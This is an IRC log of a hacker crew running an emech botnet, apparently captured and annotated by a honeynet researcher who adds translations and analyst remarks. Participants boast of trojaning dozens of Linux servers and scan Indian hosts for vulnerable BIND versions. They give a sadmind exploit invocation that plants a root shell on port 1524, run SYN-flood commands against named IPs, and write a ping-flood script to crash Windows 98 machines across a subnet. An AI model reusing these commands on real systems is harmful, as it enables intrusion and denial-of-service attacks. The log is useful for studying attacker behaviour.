      :kaos6927
      :D1ck :kaos7950 nick rofl
      :D1ck :%kaos7950 nick hierachy
      :D1ck :kaos93 nick anarchy^
      :D1ck :kaos9719 nick ultralame
      :kaos9719
      :D1ck :kaos_ nick host-l
      :kaos_
      :D1ck :kaos__ nick software
      :kaos__
      :D1ck :kaos___ nick oracle
      :kaos___
      :D1ck :kaos___ nick java
      :D1ck :kaos____ nick argv[1]
      :kaos____
      :D1ck :kaos_____ nick dotcom
      :D1ck :brb
      :J4n3 :op me
      :J4n3 :op me
      :J4n3 :op me
      :J4n3 :op me
      :J4n3 :JAVED thanx :p
      :J4n3 :tryin some more :p brb
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :_aos_____ nick lagged
      :_aos_____
      :D1ck :___s_____ nick xinetd
      :___s_____
      :D1ck :kaos1299 nick tsmurf
      :kaos1299
      :D1ck :kaos2440 nick HISTFILE
      :kaos2440
      :D1ck :kaos3708 nick cunt`
      :kaos3708
      :D1ck :kaos452 nick whore-
      :D1ck :kaos6567 nick tumble
      :D1ck :kaos7056 nick debain
      :kaos7056
      :D1ck :kaos7950  nick PHAT
      :kaos7950
      :D1ck :kaos891 nick nEtbSd
      :kaos891
      :D1ck :kaos9379 nick solaris
      :D1ck :kaos_ nick unix-r
      :D1ck :kaos__ nick slackware
      :kaos_
      :D1ck :kaos____ nick romance
      :kaos____
      :D1ck :kaos_____ nick ZoRRo^
      :kaos_____
      :D1ck :kaos4230 nick [A]]]
      :kaos4230
      :D1ck :kaos452 nick [b]]]
      :kaos452
      :D1ck :kaos6511 nick gb
      :kaos6511
      :D1ck :kaos9379 nick heat
      :D1ck :%_aos_____ nick kr-subnet
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :_aos_____ nick jang
      :_aos_____
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :kaos9379
      :D1ck :kaos1024 nick pop3
      :D1ck :kaos2922 nick imapd
      :kaos2922
      :D1ck :kaos3854 nick syko
      :D1ck :kaos4752 nick bitch_
      :kaos4752
      :D1ck :kaos3854 nick sykoseal
      :kaos3854
      :D1ck :__os_____ nick xperience
      :D1ck :_________ nick line
      :_________
      :D1ck :_________ nick line
      :D1ck :_________ nick linely
      :D1ck :wtf
      :D1ck :__os_____ nick SEX
      :__os_____
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :kaos_
      :D1ck :J4n3 
      :D1ck :J4n3 
      :J4n3 :fuck
      :J4n3 :fuck
      :D1ck :fuck?
      :D1ck Sp07 :Bitch-X BaBy
      :J4n3 :thanx :P
      :J4n3 :Haji bana diya betay betay
      
      Ok made it boy
      
      :D1ck :hehe come with yure ip i`ll add u to the new 40 bots
      :D1ck :i owned and trojaned 40 servers of linux in 3 hours
      :D1ck ::)))))
      :J4n3 :heh
      :J4n3 :damn 
      :D1ck :heh
      :J4n3 :107 bots
      :D1ck :yup
      :J4n3 :wait brb
      :D1ck :105 :P
      :J4n3 :back
      :D1ck :kewl
      :D1ck :one sec
      :J4n3 :kkz
      :D1ck :.add J4n3 * J4n3 100 1 4
      NOTICE D1ck :Handle J4n3 is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :.say hehe
      PRIVMSG 
      :Ott0 :hehe
      :anker :hehe
      :sshd :hehe
      :grep :hehe
      :jolt` :hehe
      :le :hehe
      :grep-v :hehe
      :netra :hehe
      :DEATHaCeS :hehe
      :Tota1KaaS :hehe
      :k-rad- :hehe
      :inetd-s :hehe
      :rpcbind :hehe
      :nohup :hehe
      :IgVip :hehe
      :save :hehe
      :Nine-mm :hehe
      :Animator_ :hehe
      :|ssh| :hehe
      :bevelz :hehe
      :spl1terz :hehe
      :jupe_ :hehe
      :wise :hehe
      :host-t-ns :hehe
      :s3ga :hehe
      :jupe2-bot :hehe
      :thor` :hehe
      :deb1an :hehe
      :w0lf_ :hehe
      :ttys1 :hehe
      :\dev\idle :hehe
      :slack :hehe
      :init-tab :hehe
      :cr4cked :hehe
      :Azz-Man :hehe
      :s1ack :hehe
      :Sun- :hehe
      :sximap :hehe
      :rewter :hehe
      :redcap :hehe
      :lickerz :hehe
      :host-l :hehe
      :software :hehe
      :DoS_ :hehe
      :pr0be- :hehe
      :des|re :hehe
      :satan^666 :hehe
      :digi-x :hehe
      :pathanb0t :hehe
      :b3473r :hehe
      :pimpX :hehe
      :d1g1tal :hehe
      :k-r4d :hehe
      :t0sh1ba :hehe
      :jupah :hehe
      :jupe-bot :hehe
      :CyneX :hehe
      :OngHome :hehe
      :ath0 :hehe
      :ath0_ :hehe
      :obsleet :hehe
      :kaos___ :hehe
      :unix-r :hehe
      :gb :hehe
      :heat :hehe
      :line :hehe
      :romance :hehe
      :wtf :hehe
      :jang :hehe
      :kaos6567 :hehe
      :smurf6 :hehe
      :bitch_ :hehe
      :nEtbSd :hehe
      :cunt` :hehe
      :s0lar1s :hehe
      :r00t^666 :hehe
      :Nickless :hehe
      :imapd :hehe
      :kaos__ :hehe
      :peniswise :hehe
      :VsnL2 :hehe
      
      [note from Saumil: this system is actually in India - in Bangalore. VSNL is a nationwide ISP.]
      
      :[A]]] :hehe
      :kaos1024 :hehe
      :[b]]] :hehe
      :sykoseal :hehe
      :debain :hehe
      :SEX :hehe
      :ZoRRo^ :hehe
      :lagged :hehe
      :PHAT :hehe
      :xinetd :hehe
      :argv[1] :hehe
      :tsmurf :hehe
      :ultralame :hehe
      :J4n3 :lol
      :J4n3 :.say y0 y0
      :tr1cks :y0 y0
      :Animator_ :y0 y0
      :|ssh| :y0 y0
      :bevelz :y0 y0
      :spl1terz :y0 y0
      PRIVMSG 
      :Nine-mm :y0 y0
      :wise :y0 y0
      :host-t-ns :y0 y0
      :deb1an :y0 y0
      :s1ack :y0 y0
      :sximap :y0 y0
      :\dev\idle :y0 y0
      :r00t^666 :y0 y0
      :rewter :y0 y0
      :Azz-Man :y0 y0
      :Sun- :y0 y0
      :w0lf_ :y0 y0
      :s0lar1s :y0 y0
      :redcap :y0 y0
      :slack :y0 y0
      :init-tab :y0 y0
      :cr4cked :y0 y0
      :ttys1 :y0 y0
      :Ott0 :y0 y0
      :jolt` :y0 y0
      :pr0be- :y0 y0
      :des|re :y0 y0
      :digi-x :y0 y0
      :pathanb0t :y0 y0
      :chill3r :y0 y0
      :jupe2-bot :y0 y0
      :s3ga :y0 y0
      :software :y0 y0
      :thor` :y0 y0
      :host-l :y0 y0
      :DoS_ :y0 y0
      :anker :y0 y0
      :sshd :y0 y0
      :grep :y0 y0
      :le :y0 y0
      :grep-v :y0 y0
      :netra :y0 y0
      :DEATHaCeS :y0 y0
      :Tota1KaaS :y0 y0
      :k-rad- :y0 y0
      :inetd-s :y0 y0
      :nohup :y0 y0
      :IgVip :y0 y0
      :save :y0 y0
      :OngHome :y0 y0
      :ath0 :y0 y0
      :lickerz :y0 y0
      :var1ant :y0 y0
      :ath0_ :y0 y0
      :jupah :y0 y0
      :b3473r :y0 y0
      :pimpX :y0 y0
      :d1g1tal :y0 y0
      :k-r4d :y0 y0
      :t0sh1ba :y0 y0
      :kaos___ :y0 y0
      :unix-r :y0 y0
      :gb :y0 y0
      :heat :y0 y0
      :[b]]] :y0 y0
      :line :y0 y0
      :sykoseal :y0 y0
      :tsmurf :y0 y0
      :lagged :y0 y0
      :ultralame :y0 y0
      :ZoRRo^ :y0 y0
      :jang :y0 y0
      :obsleet :y0 y0
      :kaos6567 :y0 y0
      :smurf6 :y0 y0
      :bitch_ :y0 y0
      :romance :y0 y0
      :SEX :y0 y0
      :wtf :y0 y0
      :xinetd :y0 y0
      :argv[1] :y0 y0
      :cunt` :y0 y0
      :Nickless :y0 y0
      :kaos1024 :y0 y0
      :imapd :y0 y0
      :kaos__ :y0 y0
      :debain :y0 y0
      :peniswise :y0 y0
      :PHAT :y0 y0
      :jupe-bot :y0 y0
      :CyneX :y0 y0
      :VsnL2 :y0 y0
      :[A]]] :y0 y0
      :nEtbSd :y0 y0
      :D1ck :errrr
      :D1ck :uplam taplam karta tha
      
      you're dinking around
      
      :D1ck :kity pai kity pai ji eye jo
      
      [some babbling - ending with G I Joe]
      
      :D1ck :macdonalds may hai kuch baaat
      
      is there any talk of macdonalds?
      
      :J4n3 :lol
      :oracle :hehe
      :oracle :y0 y0
      :J4n3 :wait ek second keliye channel karachi bejtha hon inko, no one is there right now, zara bharam
      
      wait for one second, sending them to channel to karachi, no one is there right now, for a little
      
      :Vamp|re` tum channel pe raaj karo :p
      
      well go ahead and rule the channel :p
      
      :J4n3 :aur kithnay chaiyen ?
      
      how many more do you want?
      
      :Vamp|re` aab kush ho gaay
      
      are you happy now?
      
      :KILLER1?:abey yaar yeh emechs hain saarey!?
      
      hey dude are these emechs all there?
      
      :KILLER1:abey yaar yeh emechs hain saarey!
      :Vamp|re`:hamain apn apata nahi chaal raha in bot ke bech main
      
      we cannot figure out ourselves in these bots? (i dont know if i could get the accurate transation on this one)
      
      :KILLER1 :baney howey hain emech sey
      
      made from emech
      
      :D1ck :hehehe
      :D1ck :sure
      :D1ck :they are secure
      :D1ck :they are secured
      :D1ck :i patched all those fucking hosts :P
      :J4n3 :haha who tho hobee gaya
      
      haha that has already been done
      
      :D1ck :and i bet naveed couldnt own bind
      :J4n3 :kub ka join karkay part karwa diya 
      
      since long made him part after joining
      
      :D1ck :haha
      :D1ck :lol
      :D1ck :kewl
      :J4n3 :hhahha
      :D1ck :hehe
      :J4n3 :usko bind ka patha hee nahin
      
      he doesnt even know about bind
      
      :D1ck :oye give me some indian class b
      :D1ck :i`ll mass own
      :J4n3 :bind ?
      :D1ck :yep
      :J4n3 :Vamp|re` yaar isko baksh day pehlay hina kay site ja chuka hai
      
      vampire, wish him well before he goes to hina's site
      
      :D1ck :?
      :J4n3 :oops
      :D1ck :mujhay aik lafz nahin samhaj may aya
      
      i cant undertstand one thing
      
      :D1ck :y0
      :D1ck :u hyper ircer
      :D1ck ::P
      :J4n3_ ::)
      :J4n3_ :ip resolve nahin huwa
      
      ip couldnt resolve
      
      :D1ck :hehe
      :D1ck :irc0p.org
      :D1ck :?
      :J4n3_ :heh yeah
      :D1ck :J4n3 it's imp when u get back messsage me.
      :J4n3 :abay i am ehre
      :J4n3 :lol
      :D1ck :ACTION is away: (sleep) [BX-MsgLog On]
      :J4n3 :D1ck 
      :J4n3 :D1ck 
      :J4n3 :netsrvrcs.saha.ernet.in's named that errors on iquery is version: 8.1.1
      
      [note : ernet.in is an Indian Educational and Research network (ERnet)]
      
      :J4n3 :hp1.example.in's named that errors on iquery is version: 8.2.1
      :J4n3 :hp2.example.in's named that errors on iquery is version: 8.2.1
      :J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2
      :J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2
      :J4n3 :tnp.example.in's named that errors on iquery is version: 8.1.2
      :J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2
      :J4n3 :192.168.151.3's named that errors on iquery is version: named 4.9.5-Rel+-
      :D1ck :b0h
      :D1ck ::)
      :D1ck :errrrr
      :D1ck :get me some domains
      :D1ck :like
      :J4n3 :hehe
      :D1ck :kewl
      :D1ck ::P
      :J4n3 :scanning horahi ahi na in.log
      
      scanning is being done in in.log
      
      [note: would be worthwhile snagging that in.log file for IPs and scan results]
      
      :D1ck :okie
      :D1ck :hehe
      :D1ck :oye 
      :J4n3 :yeah ?
      :D1ck :how big is yure cracking file?
      :D1ck :word lisT?
      :J4n3 :humm 100 mb i think
      :J4n3 :may be more not sure
      :D1ck :wow
      :D1ck :where did u get it?
      :D1ck :i want it tew
      :D1ck :i want it tew
      :J4n3 :packetstorm :p
      :D1ck :i want it tew
      :D1ck :oki
      :D1ck :;)
      :J4n3 :ARGONG's Dictionary
      :J4n3 :ARGON'S even
      :J4n3 :oye 100 mb nahin hia
      
      yo 100mb is not there
      
      :J4n3 :in zip fiel its 65 mb i think
      :J4n3 :or 25 not sure but when u unzip its 234 mb
      :D1ck :wow
      :D1ck :please give me the exact url
      :D1ck ::P
      :D1ck ::P
      :D1ck :i`ll download
      :J4n3 :dont remember yaar, i downloaded it long ago
      :D1ck :oh
      :D1ck :;(
      :J4n3 :but its in Archieve/wordlists
      :J4n3 :thats what i remember
      :D1ck :oh
      :J4n3 :D1ck 
      :J4n3 :try to use Crack5
      :D1ck :?
      :J4n3 :its kewl
      :J4n3 :and the best cracker
      :D1ck :what's that?
      :D1ck :send me
      :D1ck :send me
      :D1ck : /dcc
      :J4n3 :i dont have it
      :J4n3 :coz i couldn't configure it
      :J4n3 :but u can get it from packetstorm
      :D1ck :oh
      :J4n3 :same Archieve cracks
      :D1ck : okies
      :D1ck :i will
      :D1ck :i cant get in archieves
      :D1ck :whats the url for archives?
      :J4n3 :wait lemme check
      :D1ck :packetstorm.securify.com/archieve?
      :D1ck :?
      :J4n3 :D1ck 
      :D1ck :?
      :J4n3 :packetstorm.securify.com/assess.html
      :J4n3 :check password crackers link in this page
      :D1ck :oki
      :D1ck :and wordlist?
      :D1ck :i found it
      :D1ck ::)
      :D1ck :Read 65 KB of data, 6 KB/sec.
      :D1ck :wow
      :D1ck :6 KB
      :D1ck ::)
      :D1ck :man
      :D1ck :tehere are 300 .gz
      :D1ck :which one should i download?
      :D1ck :name
      :D1ck :?
      :D1ck :???????
      :D1ck :???????
      :D1ck :?????
      :D1ck :??????
      :J4n3 :hhaha u mean wordlist ?
      :J4n3 :look for Argon
      :D1ck :yep
      :D1ck :oiki
      :D1ck :there is no argon
      :D1ck :?
      :D1ck :????????
      :D1ck :??????????????
      :D1ck :?
      :D1ck :???????????????????????????????????????????????????
      :D1ck :???????????????????????????????????????????????????
      :D1ck :???????????????????????????????????????????????????
      :D1ck :???????????????????????????????????????????????????
      :D1ck :???????????????????????????????????????????????????
      :D1ck :oye
      :D1ck :J4n3 
      :D1ck :u there?
      :D1ck :i got d/c
      :D1ck :world tel roc
      :D1ck :world tel rox
      :D1ck :OH MY GOD
      :D1ck :10 K
      :D1ck :OH GOD
      :D1ck :6 K
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :kaos1024
      :kaos__
      :kaos6567
      
      -=-=
      
      Day 07 June 10
      
      :m4ry :YO
      :m4ry :HEY
      :m4ry :WAKE UP MORONS
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :_pen :whats goin on?
      :D1ck :nadda
      :D1ck :bored
      :_pen :em too
      :_pen :i got my first legit shell
      :D1ck :haha
      :D1ck :cool
      :D1ck :how much did u pay?
      :_pen :nothing
      :D1ck :.add D1ck * D1ck 100 1 4
      :_pen :heh
      :D1ck :.save
      :D1ck :where had u bee/.
      :D1ck :u hang in #amdx?
      :_pen :no
      :_pen :they are being gay
      :D1ck :cool
      :D1ck :hehe
      :_pen :grid is mad cuz im friends with someone he hates
      :_pen :therefor im not aloud in there
      :D1ck :hahaha
      :D1ck :grid's gay'
      :D1ck :U HANG WITH DIZASYA
      :D1ck :DIZSTA
      :D1ck :HEH
      :D1ck :i`ve hacked 30+ of his shells
      :D1ck :he doesnt even know hwo to secure it
      :D1ck :or secure a subnet
      :D1ck :tons locally
      :D1ck :_pen 
      :D1ck :dont hand over the key to any one 
      :D1ck :ok?
      :_pen :ok
      :D1ck :_pen: who gave u the key, btw?
      :D1ck :m4ry??
      :_pen :*** D1ck has joined #lecole
      :_pen :<D1ck> j #k1dd13 neat22
      :D1ck :oh
      :_pen :)
      :D1ck :h3h
      :_pen :=)
      :D1ck ::)
      :D1ck :ok
      :D1ck :what in the world are u doing in #deathaces?
      :D1ck :heh
      :_pen :what is it?
      :D1ck :a channel for fun
      :_pen :i just did a whois
      :_pen :and saw someone in there
      :_pen :and joined
      :D1ck :heh kl
      :_pen :a channel for fun == ?
      :D1ck :welp
      :D1ck :hey hang in for chatting etc
      :D1ck ::)
      :_pen :k
      :D1ck ::)
      :_pen :hey
      :_pen :do u have the syntax
      :_pen :for
      :D1ck :yeah
      :_pen :sadmind exploit
      :_pen :?
      :D1ck :lol
      :D1ck :yes
      :_pen :what is it
      :D1ck :./sparc -h hostname -c command -s sp [-o offset] [-a alignment] [-p]
      :_pen : what do i do for -c
      :D1ck :heh
      :D1ck :u dont know?
      :_pen :no
      :D1ck :"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
      :D1ck :that would open 1524
      :_pen :%sp 0x00000000 offset 688 --> return address 0x000002b0
      :_pen :[4]
      :_pen :%sp 0x00000000 with frame length 4808 --> %fp 0x000012c8
      :_pen :exploit failed; RPC succeeded and returned { 2, 343, "[1,1,1]   
      :_pen : 
      :_pen :" } 
      :D1ck :c==command
      :_pen :wtf
      :_pen :it seg faulted
      :_pen :./sadmindex-sparc -h 203.252.173.250 -c "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
      :_pen :thats what i did
      :_pen :heelo?
      :D1ck :[Lag ??] 
      :D1ck :what did u ask
      :D1ck :repeat again
      :D1ck :i got d/c
      :_pen :./sadmindex-sparc -h 203.252.173.250 -c "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
      :_pen :thats what i did
      :_pen :and it seg faulted
      :D1ck :dunno
      :D1ck :brb
      :Insekt :thanks
      :D1ck :yep
      :D1ck :np
      :D1ck :mechnet
      :Insekt :nice
      :Insekt :it was in #flem for a little while right?
      :Insekt :or some of them
      :Insekt :even
      :D1ck :?
      :insekt` :?
      :insekt` :what?
      :D1ck :hehe
      :insekt` :flem lost ops again
      :insekt` :heh
      :D1ck :shit
      :D1ck :heh
      :D1ck :i`ll fuck all of them
      :insekt` :it happens like every week
      :D1ck :to regain
      :D1ck :i offfered them bots
      :D1ck :but no no
      :D1ck :dont listen to me
      :insekt` :heh
      :D1ck :heh
      :insekt` :its always a good chan though
      :D1ck :yep
      :insekt` :with or without ops
      :D1ck :;P
      :insekt` :heh
      :D1ck :;p
      :insekt` :so, whats been going on?
      :insekt` :hah
      :insekt` :am join chan #enforcers
      :D1ck :heh
      :insekt` :elite
      :insekt` :dammit
      :insekt` :heh
      :D1ck :ACTION is away: (SLEEP) [BX-MsgLog On]
      :D1ck :cya
      :D1ck :gave to sleep
      :insekt` :see ya
      
      -=-
      
      Day 08 June 11
      
      :m4ry :.deop jupe
      :m4ry :.up
      :m4ry :wise op m4ry
      :m4ry :wise deop jupe
      :m4ry :.say hi
      :kaos__ :hi
      :kaos____ :hi
      :kaos_____ :hi
      :_aos_____ :hi
      :kaos___ :hi
      :jupe :hi
      :m4ry :jupe part
      :D1ck :kaos__ nick nutsack
      :D1ck :kaos___ nick dumbly
      :D1ck :%kaos____ nick rewted
      :D1ck :kaos_____ nick bate
      :D1ck :_aos_____ nick anarchy
      :D1ck :kaos____ nick cutlose
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :D1ck :_aos_____ nick duke
      :D1ck :J4n3 
      :D1ck ::)
      :J4n3 :D1ck nick SeXyGuy19
      :D1ck :there?
      :D1ck :hahaa
      :J4n3 :yeah :)
      :D1ck : /nick SeXyGuy19
      :J4n3 :heh
      :D1ck ::)
      :D1ck :hh
      :D1ck :;)
      :D1ck :cool bots?
      :D1ck :.add J4n3 * J4n3 100 1 4
      :D1ck :.save
      :D1ck :oye
      :D1ck :we have to change the key
      :D1ck :.join #
      :J4n3 :humm
      :D1ck :heh
      :D1ck :lagged
      :D1ck :worldtel sucks.
      :J4n3 :heh why change the key ?
      :D1ck :oye
      :D1ck :J4n3 
      :D1ck :load shells
      :D1ck :we have to dos
      :D1ck :i am ready with 4
      :D1ck :u load 4-5
      :D1ck :dos RR
      :D1ck :and
      :D1ck :Deadrat
      :J4n3 :hermm
      :D1ck :ok?????????
      :J4n3 :wait
      :D1ck :please
      :D1ck :192.168.6.223
      :D1ck :and
      :D1ck :./syn 0 192.168.6.223 1 1024
      :D1ck :ok just dos this 38 wala with 2 boxes
      :D1ck :and the other with rest
      :D1ck :coz i`m dosing it
      :D1ck :./s2 0 192.168.6.223 1 1024
      :J4n3 :humm ok
      :D1ck :okies
      :D1ck :thanks
      :D1ck :me dosing too
      :D1ck :./syn 0 192.168.6.223 1 1024
      :D1ck :oye sun u dosing?
      :D1ck :started?
      :J4n3 :yup
      :J4n3 :lagging badlay yaara
      :D1ck :oye
      :D1ck :he changed hosts
      :D1ck : Signon by DeadRat
      :D1ck :oye stop dos on him
      :D1ck :and dos
      :D1ck :node177190.example.edu
      :J4n3 :hmm
      :J4n3 :waito
      :J4n3 :./syn 0  node177190.example.edu 1 1024
      :D1ck :./syn 0 192.168.177.190 1 1024
      :D1ck :nope ip
      :J4n3 :yeah yeah 
      :D1ck :thanks
      :D1ck ::)
      :J4n3 ::O)
      :D1ck :thanks J4n3 
      :D1ck :me also dosing
      :D1ck :boh dossed
      :D1ck :both
      :D1ck ::)
      :J4n3 :hehe
      :D1ck :heh
      :D1ckhack :.part
      :D1ck :.join #
      :D1ck :.join #
      :J4n3 :oye what happened ?
      :J4n3 :oey
      :D1ckhack :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3 :oye shn1p3r
      :J4n3 :D1ck reply man
      :J4n3 :i'll tell u a kewl way :p
      :J4n3 :new trick :p
      :J4n3 :reboot windows heeh with no programz
      :J4n3 :D1ck
      :D1ckhack :.op
      :D1ckhack :.up
      :D1ck :J4n3 
      :D1ck ::)
      :D1ck :sup baby
      :J4n3 :u on winbl0ws ?
      :D1ck :nope
      :D1ck ::)
      :D1ck :128 bots
      :J4n3 :oh
      :J4n3 :i c 
      :J4n3 :lol yeah
      :J4n3 :oye i can reboot any win98 machine :p
      :D1ck :kewl
      :D1ck :0-day?
      :J4n3 :hahaha no sploit
      :D1ck :do u use ath0.c by th0m45?
      :J4n3 :just a simple ping command :p
      :D1ck :can d/c any one
      :D1ck :hahahahaha
      :D1ck :2b2b2b2000db
      :D1ck :?
      :J4n3 :no but it works only with zoltrix modem 
      :J4n3 :and it disconnects urself too :(
      :J4n3 :noooooo
      :J4n3 ::p
      :D1ck :2b2b2b415448300d
      :J4n3 :noooooooooooo
      :D1ck :oh
      :J4n3 ::p
      :D1ck :send me the coce
      :D1ck :i will make a shell script
      :J4n3 :haha abay simple online command of ping
      :J4n3 :and it will reboot any win98 machine or hang it
      :D1ck :kewl
      :D1ck :give me the ping command
      :J4n3 :but
      :J4n3 :works with linux only
      :J4n3 :and if u do it with ur own box, it will kill u with lag
      :J4n3 :do it from a linux rewt
      :J4n3 :in 1 minute it will dc and hang the system
      :J4n3 :command is
      :J4n3 :ping -f -s 65000 <IP> :pPPpPp
      :D1ck :kewl
      :D1ck :wait
      :J4n3 :ok but dont try it on me :/
      :J4n3 ::/
      :D1ck :#
      :D1ck :if [ $# 
      :D1ck :echo " "
      :D1ck :echo "[*] Usage $0 IP"
      :D1ck :echo "[*] ping reboot any win 9.x machine by D1ck, Idea by J4n3."
      :D1ck :echo " "
      :D1ck :exit
      :D1ck :else
      :D1ck :ping -f -s 65000 $1
      :D1ck :fi
      :D1ck :kewl
      :D1ck :?
      :J4n3 :lol set
      :J4n3 :tyte
      :D1ck :give me some ips
      :D1ck :hehehe
      :D1ck :dont worry
      :J4n3 :try it on 192.168.68.163
      :D1ck :oye
      :D1ck :i made a script
      :D1ck :u can reboot ever user of a class c
      :D1ck :with this
      :D1ck :./reboot.sh 192.168.252
      :J4n3 :oh no
      :D1ck :will reboot ever uses using this
      :D1ck :kewl?
      :J4n3 :shit no
      :J4n3 :wahi ping command ?
      :D1ck :heheh
      :D1ck :wait 
      :D1ck :i`m making it
      :J4n3 :kewl kewl bana,  phir syn and smurf kaa kaam khatam :P
      :J4n3 :but bnc walon ka nahin hoga :(
      :J4n3 :unkay liye syn hee sahi hai
      :D1ck :yep
      :D1ck :?
      :D1ck :oye how many ppl know about it?
      :J4n3 :no one
      :J4n3 :except moi :p
      :J4n3 :dont spread it :p
      :J4n3 :i've seen it written somewhere in a txt of some sploit
      :J4n3 :but its not common, and no one know about it yet
      :D1ck :kewl
      :D1ck :oye done 
      :D1ck :i`ll send u ina  phew
      :J4n3 :kewl kewl :P
      :J4n3 :okies :)
      :J4n3 :try it on some isp
      :D1ck :yep
      :D1ck :oye J4n3 
      :D1ck :give me some isp
      :D1ck :which should i n3wk
      :D1ck :?
      :J4n3 :hmmm
      :J4n3 :try satnet naa
      :D1ck :?hahha
      :D1ck :ok
      :D1ck :192.168.2?
      :D1ck :192.168.25/?
      :D1ck :?
      :J4n3 :hmm
      :J4n3 :192.168.25.*
      :D1ck :./rebootclass.sh 192.168.25.1
      :J4n3 :kewl lets see
      :D1ck :...............................................................................................................................................................................................................................................................................................................................................................
      :D1ck :one sec
      :D1ck :let me see
      :D1ck :i think i`ll have to write a looop
      :D1ck :but lets see
      :J4n3 :hmm ok
      :D1ck :ooops
      :D1ck :i frgot to chmod +x a file hehe
      :D1ck :fixed
      :J4n3 ::??
      :J4n3 :lol
      :J4n3 :ok
      :D1ck :done
      :D1ck :lets see if they ping out
      :D1ck :join #delusion
      :D1ck :and see
      :D1ck :?P
      :J4n3 :ok wait
      :D1ck :oye
      :D1ck :are u sure this command works?
      :D1ck :give me some ip
      :D1ck :i`ll d.c them
      :J4n3 :100 %
      :J4n3 ::p
      :J4n3 :when i try it on a single ip, it goes down 101 %
      :J4n3 :haven't found one who didn't go offline
      :D1ck :oye
      :D1ck :u there?
      :D1ck :J4n3 
      :D1ck :fucking worldtel
      :D1ck :fucking worldtel
      :D1ck :fucking worldtel
      :D1ck :fucking worldtel
      :D1ck :fucking worldtel
      :D1ck :fucking worldtel
      :D1ck :sux muh azz
      :D1ck ::)
      :D1ck :'az''
      :D1ck :accept the script
      :D1ck :hmmm
      :D1ck :?
      :D1ck :J4n3 
      :D1ck :world tel
      :D1ck :sux
      :D1ck :J4n3 
      :D1ck :NEW KEY J4n3 
      :D1ck :get it
      :D1ck ::)
      :D1ckhack :ACTION is away: (MOVIE #@$@
      :D1ck :ACTION is away: (MOVIE #@$@
      :D1ck :pnp sux
      :D1ck :pnp sux
      :J4n3 :lol still ?
      :D1ck :when i double click i want the chaninfo with topic bans etc
      :D1ck :it gives me a input box, to write topic
      :D1ck :blah
      :D1ck :heh
      :J4n3 :HAHAHAHAH
      :J4n3 :lol
      :D1ck ::P
      :J4n3
      :J4n3
      :J4n3
      :J4n3
      :D1ck :(@az): and what's with the topic
      :D1ck :*** BigPoppa changes topic to 'booop'
      :D1ck :(@az): owning g|nger` ?
      :D1ck :*** DeadRat sets mode: +o h4r33
      :D1ck :l3w|
      :J4n3 :hehe
      :D1ck :(symetrix`): im a korjap
      :D1ck :(@h4r33): <maxxed> 24.143.24.1
      :D1ck :(@h4r33): <maxxed> its my uplink and its unkillable
      :D1ck :(@h4r33): <maxxed> sure you can kill me but you can't take the uplink down
      :D1ck :(@h4r33): HAHAAAAAAAAAAAA
      :D1ck :(@madcow-): why would you want to kill your uplink?
      :D1ck :* symetrix` munches on some rice
      :D1ck :(@h4r33): mother fuckin uplink is DEAD
      :D1ck :he thinks dosing is 'COO'L' *shrug*
      :J4n3 :lol
      :D1ck :(@BigPoppa): diz
      :D1ck :(@BigPoppa): has there ever been something you couldnt kill?
      :D1ck :(@madcow-): me
      :D1ck :(@madcow-): :)
      :D1ck :(@h4r33): not yet
      :D1ck :oye
      :D1ck :come to windows
      :D1ck :and i`m loading up 30+ of my shells
      :D1ck :to dos
      :D1ck :u load too
      :J4n3 :i am in windows
      :J4n3 :and ready to dos
      :D1ck :if u want
      :J4n3 :just give me the IP
      :D1ck :if u dont we will do it another day
      :D1ck ::)
      :J4n3 :i have 11 boxes ready
      :D1ck :kewl
      :D1ck :let me load up
      :J4n3 :kkz
      :D1ck :how many boxes?
      :J4n3 :11
      :D1ck :oki
      :D1ck :[*] Loading Boxens....
      :J4n3 :heh
      :J4n3 :ip ?
      :J4n3 :my 11 boxes r enuff to take down anyone :p
      :D1ck :lol
      :D1ck ::)
      :J4n3 ::)
      :J4n3 :ogin: root
      :J4n3 :Password:
      :J4n3 :Sun Microsystems Inc.   SunOS 5.7       Generic October 1998
      :J4n3 :These are the times that try anybody's soul.
      :J4n3 :A bird in the hand can bite. 
      :J4n3 :You have mail.
      :J4n3 :# cd /dev/".. "/sun2/packet
      :J4n3 :# 
      :D1ck :system.example.com
      :D1ck :oye
      :D1ck :do this
      :D1ck :dig @system.example.com version.bind chaos txt
      :D1ck :and paste me what u get
      :J4n3 :i'm on windows
      :J4n3 :where ??
      :J4n3 :from any box ?
      :D1ck :oh
      :D1ck :try if dig works
      :J4n3 :wait
      :J4n3 :VERSION.BIND.           0S CHAOS TXT    "8.2.1"
